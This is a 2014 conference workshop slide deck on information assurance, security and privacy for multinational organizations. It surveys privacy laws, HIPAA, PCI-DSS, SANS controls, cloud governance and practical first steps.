Workshop at the WCIT 2014 Information Assurance in a Global Context Matt Stamper, redIT

1. Information Assurance in a Global Context:
Strategies for Security and Privacy for Cross-Border and
Multi-national Organizations
Matt Stamper, MPIA, MS, CISA, ITIL
VP of Services: redIT
President: ISACA San Diego Chapter
Co-Chair: InfraGard San Diego
Board of Advisors: Multiple
WCIT
Guadalajara, Jalisco
September 28th, 2014

2. Agenda
 Why information assurance (IA) matters
 Core Definitions: ILM, Security, Privacy, and IA
 Regulatory Requirements
 Frameworks & Approaches
 New Technologies: IoT & Cloud
 Lessons from Tijuana/San Diego
 Questions & Comments

3. PAGE 3
Why Information Assurance Matters…
 We rarely question the quality of information we use to make
decisions…putting our organizations, economies, and personal lives at
risk
 Information is the most valuable asset in our economy and fuels
innovation & growth (data is the raw material of the global economy)
o Commerce
o Science
o Government
 Our dependencies on accurate and timely information are increasing
exponentially
 Massive asymmetries in IA practices
 Gap between laws & regulations and practice
 Critically, trust is at risk!

4. PAGE 4
Trust and Societies: Quantifiable Impact
“If you take a broad enough definition of trust, then it would explain basically all the
difference between the per capita income of the United States and Somalia,” ventures
Steve Knack, a senior economist at the World Bank who has been studying the economics
of trust for over a decade. That suggests that trust is worth $12.4 trillion dollars a year to
the U.S., which, in case you are wondering, is 99.5% of this country’s income (2006
figures). If you make $40,000 a year, then $200 is down to hard work and $39,800 is down
to trust” (http://www.forbes.com/2006/09/22/trust-economy-markets-tech_
cx_th_06trust_0925harford.html)
Trust is essential to maintaining the social and economic benefits that networked
technologies bring to the United States and the rest of the world” (Consumer Data Privacy
in a Networked World: A Framework for Protecting Privacy and Promoting Innovation in
the Global Digital Economy, February, 2012: White House)
Trust is at the heart of today’s complex global economy. But, paradoxically, trust is also in
increasingly short supply in many of our societies, especially in our attitudes towards big
business, parliaments and governments. This decline threatens our capacity to tackle
some of today’s key challenges (http://www.oecd.org/forum/the-cost-of-mistrust.htm)

5. PAGE 5
The Impact of Lost Trust on Society
Financial Crisis
http://www.youtube.com/watch?v=uw_Tgu0txS0

6. International Data Flows: The Global Currency
“The Growth of the Internet and the ability to move data rapidly and globally has been a key building block of the
global economic order” (The Internet, Cross-Border Data Flows and International Trade, Joshua Meltzer, The
Brookings Institute, February, 2013)
“Exports (emphasis mine) of cloud computing services were estimated to be worth approximately $1.5b in 2010 (and
this is likely a conservative figure and the market for cloud computing services is anticipated to grow by up to 600
percent by 2015” (Policy Challenges of Cross-Border Computing” – Journal of International Commerce and Economics,
November 2012).
PAGE 6
 Over 2 Billion Individual have access to the Internet
 More devices will be connected than people – billions of devices
 Nearly free transaction costs
 The days of information arbitrage are over
 Barriers to innovation & exploitation are equally low
Critical Shared Data Sets
 Weather & Climate data
 Census data
 Healthcare and Disease Control data
 Financial & Currency data
 Trade data
A McKinsey Global Institute study estimated that the Internet contributed over 10 percent to GDP growth in the last
five years to the world’s top ten economies and for every job lost as a result of the Internet, 2.6 jobs have been
created.

7. Open Government Initiatives: Public Sector Data
PAGE 7
Governments across the globe recognize that information is both:
 A national resource that requires protection
 A public good that should be readily disseminated
Key areas of focus within the Open Government community include:
 Transparency with budgets & procurement
 Private/Public Sector data sharing
 Innovation
“The original and essentially libertarian nature of the Internet is increasingly being challenged by
assertions by government of jurisdiction over the Internet or the development of rules that restrict
the ability of individuals and companies to access the Internet and move data across borders” (The
Internet, Cross-Border Data Flows and International Trade, Joshua Meltzer, The Brookings Institute,
February, 2013)

8. PAGE 8
Why Information Assurance is Critical Now!
Here’s just a quick sampling of what’s occurring on a daily basis. This is just the US public
sector.
Organized Criminals in Russia Steal 1b Passwords (8/5/2014)
http://www.nytimes.com/2014/08/06/technology/russian-gang-said-to-amass-more-than-a-billion-
stolen-internet-credentials.html?_r=0
JP Morgan Potentially Compromised (8/18/2014)
http://online.wsj.com/articles/fbi-probes-possible-computer-hacking-incident-at-j-p-morgan-
1409168480
Hospital Hacked – 4.5 Million Records Compromised (8/18/2014)
http://money.cnn.com/2014/08/18/technology/security/hospital-chs-hack/
Home Depot
http://www.forbes.com/sites/quickerbettertech/2014/09/22/why-the-home-depot-breach-is-worse-
than-you-think/
Target
http://online.wsj.com/news/articles/SB10001424052702304773104579266743230242538
The Car (2014 Moving Forward)
http://money.cnn.com/2014/06/01/technology/security/car-hack/

9. PAGE 9
The Assault on Healthcare & ePHI
 According to a Ponemon Institute Study, criminal attacks on healthcare systems
have risen 100% since 2010 with an average cost of a breach is $2m (US)
 Over 90% of healthcare organizations have had a breach in the last two years with
38% having had more than five incidents (down from 45% the previous year)
 Risks with mandated health information exchanges (third-party considerations) /
weakest link despite security standards from HIPAA-HITECH
 Bring Your Own Device (BYOD) - nearly 50% of breaches attributed to a lost or
stolen device and over 88% of organizations allow the use of BYOD
 Fortunately, the number of records compromised has decreased based on earlier
detection and incident response – we’re getting better at handling security
breaches…practices makes perfect?

10. Working Definitions

11. PAGE 11
Security - Defined
The easiest way to think about security is to think about the outcome of what good
security provides: confidentiality, integrity, and availability of information (CIA).
Confidentiality is the end-state of ensuring that information is only viewed and
acted upon by those individuals, organizations, or systems that are authorized to
see such information. “A loss of confidentiality is the unauthorized disclosure of
information” – FIPS 199.
Integrity is the end-state of information and its processing such that the
information is believed to be complete, accurate, valid and subject to restricted
access (CAVR)…essentially un tampered with or otherwise modified by
unauthorized activity. “A loss of integrity is the unauthorized modification or
destruction of information” – FIPS 199.
Availability is simply that…that the information is available for its required use
without delay or loss. “A loss of availability is the disruption of access to or use of
information or an information system” – FIPS 199.
Collectively, IT security is the set of processes that are involved with ensuring that
data and information meet the confidentiality, integrity, and availability objectives of
business.

12. PAGE 12
Privacy - Defined
Definitions of privacy are growing more nuanced over time.
Privacy is “the right to be left alone” (Samual Warren & Louis Brandeis: The Right to
Privacy, Harvard Law Review, 1890).
Privacy is “the right of the individual to be protected against the intrusion into his
(her) personal life or affairs, or those of his (her) family, by direct physical means or by
publication of information” (UK, Calcutt Committee: 1997)
Privacy has contextual considerations:
 Information Privacy
 Bodily Privacy
 Territorial / Physical Privacy
 Communications Privacy
(Foundations of Information Privacy and Data Protection, Swire, et. al., IAPP, 2012)

13. PAGE 13
Information Assurance: Three Perspectives
National Defense: Information Assurance as a concept is strongly
influenced by the defense and national security communities and the
concept of network centric warfare techniques:
“Measures that protect and defend information systems by ensuring their
availability, integrity, authentication, confidentiality, and non-repudiation.
This includes providing for restoration of information systems by
incorporating protection, detection, and reaction capabilities” (Department
of Defense Directive Number 8500.1: October 24, 2002)
Corporate View: Intellectual Property, Financial, Client & Partner Data,
is subject to appropriate governance & controlled – CAVR.
Consumer View: Personal Health, Financial and other UII Data is
controlled by the individual and disclosure is also controlled by the
individual.

14. PAGE 14
Data Classification
Given the regulatory and jurisdictional issues related to information and data flows,
organizations need to implement best practices to classify their data. There are a
number of approaches including:
National Security
• Top Secret
• Classified
• Unclassified:FOUO
Corporate Security
 Confidential
 Proprietary
 Privileged / Restricted Access
Personal Data
• ePHI
• Financial Information
• Phone, Internet & Utility

15. PAGE 15
Information Lifecycle & IA
Tech Target: http://searchdatamanagement.techtarget.com/feature/Information-assurance-
Dependability-and-security-of-networked-information-systems
Cloud Security Alliance

16. Bringing It All Together: IA, Security, and Privacy
If we agree that information is the new global currency and that innovation and growth
are predicated on the quality of the information and data we use, it’s important that
we couple IA, Security and Privacy and make information governance a top priority for
our organizations.
PAGE 16
Let’s get to work!

17. Privacy Laws & Standards
By Country / Region
• Mexico
• Canada
• US
• EU
• APEC
By Industry
 HIPAA-HITECH
 Financial Services

18. PAGE 18
Laws & Regulations: Mexico, Canada and US
Mexico – National Privacy Law
http://www.diputados.gob.mx/LeyesBiblio/pdf/LFPDPPP.pdf
Canada – National Privacy Law
https://www.priv.gc.ca/index_e.asp
https://www.priv.gc.ca/leg_c/leg_c_p_e.asp
US – Sectoral Approach (Federal Trade Commission)
http://www.whitehouse.gov/sites/default/files/privacy-final.pdf
States
Massachusetts - http://www.mass.gov/ocabr/docs/idtheft/201cmr1700reg.pdf
California - http://oag.ca.gov/ecrime/databreach/reporting
Nevada - http://www.leg.state.nv.us/NRS/NRS-603A.html

19. PAGE 19
Laws & Regulations: Australia, APEC & Europe (EU)
Australia
http://www.oaic.gov.au/privacy/privacy-act/the-privacy-act
http://www.oaic.gov.au/privacy/privacy-resources/privacy-fact-sheets/
other/privacy-fact-sheet-17-australian-privacy-principles
APEC
http://www.apec.org/About-Us/About-APEC/Fact-Sheets/APEC-Privacy-
Framework.aspx
European Union
http://europa.eu/about-eu/countries/member-countries/index_en.htm
http://ec.europa.eu/dataprotectionofficer/legal_framework_en.htm
https://safeharbor.export.gov/list.aspx (Safe Harbor Registrants)

20. PAGE 20
Privacy & Security – Inextricably Linked
Security can exist without privacy but privacy
cannot exist without security. Consequently,
privacy frameworks offer insights into good
governance and security practices though many
standards and frameworks have been challenged
by recent events – notably the Payment Card
Industry – Data Security Standard (PCI-DSS).

21. PAGE 21
International Privacy Regimes: APEC & OECD
APEC - 2004 OECD - 1980
Preventing Harm Collection Limitation Principle
Notice Data Quality Principle
Collection Limitation Purpose Specification Principle
Uses of Personal Information Use Limitation Principle
Choice Security Safeguards Principle
Integrity of Personal Information Openness Principle
Security Safeguards Individual Participation Principle
Access and Correction Accountability
Accountability

22. PAGE 22
International Privacy (Cont.): FIPS & Madrid
FIPS (1973) Madrid Resolution (2009)
No Secret Repositories Principle of Lawfulness & Fairness
Individual Control Over Use Purpose Specification Principle
Individual Consent Proportionality Principle
Correction Data Quality
Precautions Against Misuse Openness Principle
Accountability

23. HIPAA-HITECT: Administrative, Physical & Technical
PAGE 23
Security Management Process
164.308(a)(1)
Risk Analysis
Risk Management
System Review
Assigned Security Responsibility
164.308(a)(2)
Accountability
Workforce Security
164.308(a)(3)
Authorization and/or
Supervision, Clearance & Termination
Procedures
Information Access Management
164.308(a)(4)
RBAC Procedures
Security Awareness and Training
164.308(a)(5)
Anti-malware, log-in procedures,
password management
Security Incident Procedures
164.308(a)(6)
Incident Response Procedures

24. HIPAA-HITECT: Administrative, Physical & Technical
PAGE 24
Contingency Plan
164.308(a)(7)
Backup & Recovery
BC/DR Procedures & Testing
Applications and Data Criticality Analysis
Evaluation
164.308(a)(8)
Review of Systems
Business Associate Contracts and
Other Arrangements
164.308(b)(1)
Contractual Obligations with Service Providers
(Business Associates)
Cascading Liability
Facility Access Controls
164.310(a)(1)
Access Controls, Maintenance of Records,
Contingency Operations
Access Control
164.312(a)(1)
Encryption, Decryption, Log-off, Emergency
Access*
Audit Controls
164.312(b)
Evidence of Review
Transmission Integrity Controls (A)
Security 164.312(e)(1)
Security and Integrity

25. Gramm-Leach-Bliley (GLB) – FTC Enforcement
Financial Services Firms have an obligation to safeguard non-public information (NPI)
such as full account numbers, social security numbers (SSNs), etc.
PAGE 25
Obligations:
 Privacy Notices
 Non-Affiliated Third Parties & Opt Out
 Ensure the Security & Confidentiality of Customer Records
 Protect Against Anticipated Threats or Hazards
 Protect Against Unauthorized Access
The FTC has established a clear expectation of security as a corporate
obligation.

26. Security Frameworks
Security Frameworks & Standards
• SANS 20
• PCI-DSS
• ISO 27001/27002
• Cloud Security Alliance
• COBIT (ISACA)

27. PAGE 27
SANS Top 20 Security Controls
The SANS Top 20 is considered a good set of minimum necessary security controls.
The controls cover a broad suite of good control activity:
 Critical Control 1: Inventory of Authorized and Unauthorized Devices
 Critical Control 2: Inventory of Authorized and Unauthorized Software
 Critical Control 3: Secure Configurations for Hardware and Software on
Mobile Devices, Laptops, Workstations, and Servers
 Critical Control 4: Continuous Vulnerability Assessment and Remediation
 Critical Control 5: Malware Defenses
 Critical Control 6: Application Software Security
 Critical Control 7: Wireless Device Control
 Critical Control 8: Data Recovery Capability
 Critical Control 9: Security Skills Assessment and Appropriate Training to
Fill Gaps
 Critical Control 10: Secure Configurations for Network Devices such as
Firewalls, Routers, and Switches

28. PAGE 28
SANS Top 20 Security Controls
The SANS Top 20 is considered a good set of minimum necessary security controls.
The controls cover a broad suite of good control activity:
 Critical Control 11: Limitation and Control of Network Ports, Protocols, and
Services
 Critical Control 12: Controlled Use of Administrative Privileges
 Critical Control 13: Boundary Defense
 Critical Control 14: Maintenance, Monitoring, and Analysis of Audit Logs
 Critical Control 15: Controlled Access Based on the Need to Know
 Critical Control 16: Account Monitoring and Control
 Critical Control 17: Data Loss Prevention
 Critical Control 18: Incident Response and Management
 Critical Control 19: Secure Network Engineering
 Critical Control 20: Penetration Tests and Red Team Exercises

29. PAGE 29
PCI-DSS: 3.0 – 12 Requirements
Requirement 1: Install and maintain a firewall configuration to protect cardholder
data
Requirement 2: Do not use vendor-supplied defaults for system passwords and
other security parameters
Requirement 3: Protect stored cardholder data
Requirement 4: Encrypt transmission of cardholder data across open, public
networks
Requirement 5: Protect all systems against malware and regularly update anti-virus
software or programs
Requirement 6: Develop and maintain secure systems and applications
https://www.pcisecuritystandards.org/documents/PCI_DSS_v3.pdf

30. PAGE 30
PCI-DSS: 3.0 – 12 Requirements
Requirement 7: Restrict access to cardholder data by business need to know
Requirement 8: Identify and authenticate access to system components
Requirement 9: Restrict physical access to cardholder data
Requirement 10: Track and monitor all access to network resources and
cardholder data
Requirement 11: Regularly test security systems and processes.
Requirement 12: Maintain a policy that addresses information security for all
personnel.
Requirement A.1: Shared hosting providers must protect the cardholder data
environment
https://www.pcisecuritystandards.org/documents/PCI_DSS_v3.pdf

31. PAGE 31
ISO:27001, CSA & ISACA
There are three organizations that are driving good security standards and practices in
particular that should be part of an organization’s control design:
International Standards Organization (ISO)
http://www.iso.org/iso/home/standards/management-standards/iso27001.htm
Cloud Security Alliance (CSA)
https://cloudsecurityalliance.org/
Information Systems Audit and Control Association (ISACA)
https://www.isaca.org/Pages/default.aspx

32. PAGE 32
COBIT – Cloud Governance
ISACA’s “IT Control Objectives for Cloud Computing: Controls and
Assurance in the Cloud” provides a solid framework for assessing
controls in cloud environments and a reference for good governance.
“ISACA defines governance as the set of responsibilities and
practices exercised by the board and executive management with
the goal of providing strategic direction, ensuring that objectives
are achieved and ascertaining that risks are managed
appropriately.”
Leveraging cloud services requires controls and governance that
touch upon the following:
Plan and Organize (PO) Acquire and Implement (AI)
Deliver & Support (DS) Monitor & Evaluate (ME)

33. Technology and IA
Internet of Things (IoT)
Cloud Computing

34. PAGE 34
Internet of Things
http://www.theregister.co.uk/2014/05/07/freescale_internet_of_things/

35. PAGE 35
On Site
Applications
Database
O/S
Hypervisors
Servers
Storage
Networks
Backups
Infrastructure
(as a Service)
Applications
Database
O/S
Hypervisors
Servers
Storage
Networks
Backups
Platform
(as a Service)
Applications
Database
O/S
Hypervisors
Servers
Storage
Networks
Backups
Software
(as a Service)
Applications
Database
O/S
Hypervisors
Servers
Storage
Networks
Backups
Service Demarcation & Information Assurance
Security, Monitoring & Governance: Critical Foundation
Roles & Responsibilities are Crucial Regardless of the Service Model

36. PAGE 36
Application
Application
Database
OS
Hypervisors
Servers
Storage
Network
Backups
S E C U R I T Y
M O N I T O R I N G
I T I L / S E R V I C E MA N G EMEN T
• Audit Trail
• Client
• SaaS
• Segregation of Duties
• What is logged?
• Who’s responsible for
the application is based
on the service model
• How is the application
impacted by other
layers?
• What information is
shared among layers?
• Shared administrative
D a t a C e n t e r accounts?

37. PAGE 37
Cloud Layers – Application Risk
Applications probably offer the widest array of risks to
organizations. One of the key reasons…think about who uses
applications…it’s us.
Applications – Typical Risks:
 Human error / social networking exposure / APT attacks
 Segregation of duties / elevated privileges
 Database linkages / poor data validation
 Session-hacking, man-in-the-middle attacks, cross-site scripting
 Poor application coding
 Poor passwords (complexity/aging)
 Poor logging habits
 Many firewalls are not application aware (just ports 80, 443)
 Other considerations?

38. PAGE 38
Database
Application
Database
OS
Hypervisors
Servers
Storage
Network
Backups
S E C U R I T Y
M O N I T O R I N G
I T I L / S E R V I C E MA N G EMEN T
• Database activity
monitoring
• Time-stamping
transactions / logs
• Memory-based
databases…data living
in memory
• HADOOP and other
changing non-database
approaches to analytics
D a t a C e n t e r

39. PAGE 39
Service Provider Considerations
Contracts Matter – Wrap Around Agreements Present Risks to Organizations
 Right to audit clause
 Data location covenants
 Compliance Reviews:
 SSAE 16 SOC 1
 ISAE 3402
 SOC 2
 Roles & Responsibilities
 Statements of Work

40. PAGE 40
Common Themes
• Inventory of Information
• Inventory of Critical Assets
• Supply-Chain / Vendor assessments
• Risk Assessments
• Security Assessments
• Board of Directors
• Executive Responsibility
• Investment in Training & Competencies

41. PAGE 41
Tijuana – San Diego (Our IA Ecosystem)
Brier & Thorn – SOC in Tijuana
http://brierandthorn.com/
BridgeSTOR – Cloud Data Encryption
http://bridgestor.com/
CyberFlow Analytics – APT Solution
http://www.cyberflowanalytics.com/
CyberTECH & CyberHive
http://cybertechnetwork.org/
http://cyberhivesandiego.org/cybertech/
InfraGard
http://www.infragardsd.org/
ISACA – SD
http://isaca-sd.org/

42. PAGE 42
Quick Wins
Information Assurance begins with:
• Know Legal Obligations
• Data Classification
• Data Inventory
• Data Retention
• Privacy Impact Assessment
• Security / Vulnerability Assessment
• Keep The Board Informed – No Surprises
• Assume a Breach!

43. PAGE 43
References
Privacy
https://www.privacyrights.org/data-breach/new
http://www.hhs.gov/ocr/privacy/hipaa/administrative/bre
achnotificationrule/breachtool.html
https://www.enisa.europa.eu/activities/identity-and-trust/
risks-and-data-breaches/dbn
Security
https://www.isaca.org
http://www.sans.org/
http://www.nist.gov/cybersecurity-portal.cfm
https://cloudsecurityalliance.org/

44. us.redit.com
Matt Stamper, MPIA, MS, CISA, ITIL (CIPP-US: Pending)
T 858.836.02224
M 760.809.2164
E matt.stamper@redIT.com